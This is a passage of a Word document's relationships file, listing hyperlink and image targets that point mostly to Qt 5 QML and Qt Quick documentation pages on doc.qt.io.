Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-canvas3d.html" TargetMode="External"/><Relationship Id="rId2173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-flow-text2.png" TargetMode="External"/><Relationship Id="rId2478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertyanimation.html" TargetMode="External"/><Relationship Id="rId3017" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qtcreator/creator-debugging-qml.html" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-definetypes.html" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-networktransparency.html" TargetMode="External"/><Relationship Id="rId1287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-statemachine-signaltransition.html" TargetMode="External"/><Relationship Id="rId2033" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qpainter.html" TargetMode="External"/><Relationship Id="rId2240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2685" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2892" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-interactqmlfromcpp.html" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId657" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId864" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-cullface.html" TargetMode="External"/><Relationship Id="rId1494" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId1799" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-dialog.html" TargetMode="External"/><Relationship Id="rId2100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId2338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-anchorchanges.html" TargetMode="External"/><Relationship Id="rId2545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-topic.html" TargetMode="External"/><Relationship Id="rId2752" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-anchors.html" TargetMode="External"/><Relationship Id="rId724" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-anchorchanges.html" TargetMode="External"/><Relationship Id="rId931" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-folderdialog.html" TargetMode="External"/><Relationship Id="rId1147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathattribute.html" TargetMode="External"/><Relationship Id="rId1354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-tabview.html" TargetMode="External"/><Relationship Id="rId1561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId2405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2612" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1007" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-radialgradient.html" TargetMode="External"/><Relationship Id="rId1421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-valueaxis3dformatter.html" TargetMode="External"/><Relationship Id="rId1659" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1866" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-ellipseshape.html" TargetMode="External"/><Relationship Id="rId2917" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-interactqmlfromcpp.html" TargetMode="External"/><Relationship Id="rId1519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId1726" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1933" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId2195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/documents-definetypes-simple.png" TargetMode="External"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qwindow.html" TargetMode="External"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-trailemitter.html" TargetMode="External"/><Relationship Id="rId2055" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-focusscope.html" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId679" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-locale.html" TargetMode="External"/><Relationship Id="rId886" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-dialog.html" TargetMode="External"/><Relationship Id="rId2567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/listview-setup.png" TargetMode="External"/><Relationship Id="rId2774" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-signals.html" TargetMode="External"/><Relationship Id="rId539" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-buttonstyle.html" TargetMode="External"/><Relationship Id="rId746" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-axisaccumulator.html" TargetMode="External"/><Relationship Id="rId1071" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-maprectangle.html" TargetMode="External"/><Relationship Id="rId1169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-pieslice.html" TargetMode="External"/><Relationship Id="rId1376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-themecolor.html" TargetMode="External"/><Relationship Id="rId1583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-cppextensionpoints.html" TargetMode="External"/><Relationship Id="rId2122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-state.html" TargetMode="External"/><Relationship Id="rId2981" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtwebengine-index.html" TargetMode="External"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlextensionplugin.html" TargetMode="External"/><Relationship Id="rId953" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-geometryrenderer.html" TargetMode="External"/><Relationship Id="rId1029" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-keyevent.html" TargetMode="External"/><Relationship Id="rId1236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-rendertarget.html" TargetMode="External"/><Relationship Id="rId1790" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-window.html" TargetMode="External"/><Relationship Id="rId1888" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-wander.html" TargetMode="External"/><Relationship Id="rId2634" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-models-abstractitemmodel-example.html" TargetMode="External"/><Relationship Id="rId2841" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgsimplematerial.html" TargetMode="External"/><Relationship Id="rId2939" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmetaobject.html" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId606" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-recursiveblur.html" TargetMode="External"/><Relationship Id="rId813" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-category.html" TargetMode="External"/><Relationship Id="rId1443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwayland-compositor-waylandcompositor.html" TargetMode="External"/><Relationship Id="rId1650" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png" TargetMode="External"/><Relationship Id="rId1748" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId2701" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId1303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-splineseries.html" TargetMode="External"/><Relationship Id="rId1510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1955" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId1608" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-window-window.html" TargetMode="External"/><Relationship Id="rId1815" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qcoreapplication.html" TargetMode="External"/><Relationship Id="rId3030" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qtcreator/images/qml-script-console.png" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qurl.html" TargetMode="External"/><Relationship Id="rId2077" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qwindow.html" TargetMode="External"/><Relationship Id="rId2284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId2491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-animations.html" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-behavior.html" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId670" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1093" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-menuseparator.html" TargetMode="External"/><Relationship Id="rId2144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/simplematerial-example.jpg" TargetMode="External"/><Relationship Id="rId2351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId2796" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-binding.html" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-var.html" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId530" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquicklayouts-index.html" TargetMode="External"/><Relationship Id="rId768" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-boxset.html" TargetMode="External"/><Relationship Id="rId975" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-hbarmodelmapper.html" TargetMode="External"/><Relationship Id="rId1160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-phongalphamaterial.html" TargetMode="External"/><Relationship Id="rId1398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-trace.html" TargetMode="External"/><Relationship Id="rId2004" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId2449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertyaction.html" TargetMode="External"/><Relationship Id="rId2656" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtableview.html" TargetMode="External"/><Relationship Id="rId2863" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId628" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qstringlist.html" TargetMode="External"/><Relationship Id="rId835" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-colorgradientstop.html" TargetMode="External"/><Relationship Id="rId1258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-scatterdataproxy.html" TargetMode="External"/><Relationship Id="rId1465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebview-webviewloadrequest.html" TargetMode="External"/><Relationship Id="rId1672" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquicklayouts-overview.html" TargetMode="External"/><Relationship Id="rId2309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId2723" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId1020" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwinextras-jumplistseparator.html" TargetMode="External"/><Relationship Id="rId1118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-normaldiffusemapalphamaterial.html" TargetMode="External"/><Relationship Id="rId1325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-extras-statusindicator.html" TargetMode="External"/><Relationship Id="rId1532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qt.html" TargetMode="External"/><Relationship Id="rId1977" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2930" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlproperty.html" TargetMode="External"/><Relationship Id="rId902" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dragevent.html" TargetMode="External"/><Relationship Id="rId1837" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlepainter.html" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId2099" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/visualize-clip.png" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlparserstatus.html" TargetMode="External"/><Relationship Id="rId1904" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId485" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-keys.html" TargetMode="External"/><Relationship Id="rId692" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-abstract3dseries.html" TargetMode="External"/><Relationship Id="rId2166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-openglunderqml-example.html" TargetMode="External"/><Relationship Id="rId2373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-grid-spacing.png" TargetMode="External"/><Relationship Id="rId2580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-vector4d.html" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId997" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-inputhandler3d.html" TargetMode="External"/><Relationship Id="rId1182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-pluginparameter.html" TargetMode="External"/><Relationship Id="rId2026" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmlexampletoggleswitch.html" TargetMode="External"/><Relationship Id="rId2678" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId2885" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-scope.html" TargetMode="External"/><Relationship Id="rId857" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcanvas3d-context3d.html" TargetMode="External"/><Relationship Id="rId1042" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-leveladjust.html" TargetMode="External"/><Relationship Id="rId1487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId1694" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId2300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId2538" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-topic.html" TargetMode="External"/><Relationship Id="rId2745" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId2952" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmlfirststeps.html" TargetMode="External"/><Relationship Id="rId717" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-altimeterreading.html" TargetMode="External"/><Relationship Id="rId924" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-filterkey.html" TargetMode="External"/><Relationship Id="rId1347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-systemtrayicon.html" TargetMode="External"/><Relationship Id="rId1554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1761" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId1999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgvertexcolormaterial.html" TargetMode="External"/><Relationship Id="rId2605" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qstringlist.html" TargetMode="External"/><Relationship Id="rId2812" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitemgrabresult.html" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-topic.html" TargetMode="External"/><Relationship Id="rId1207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 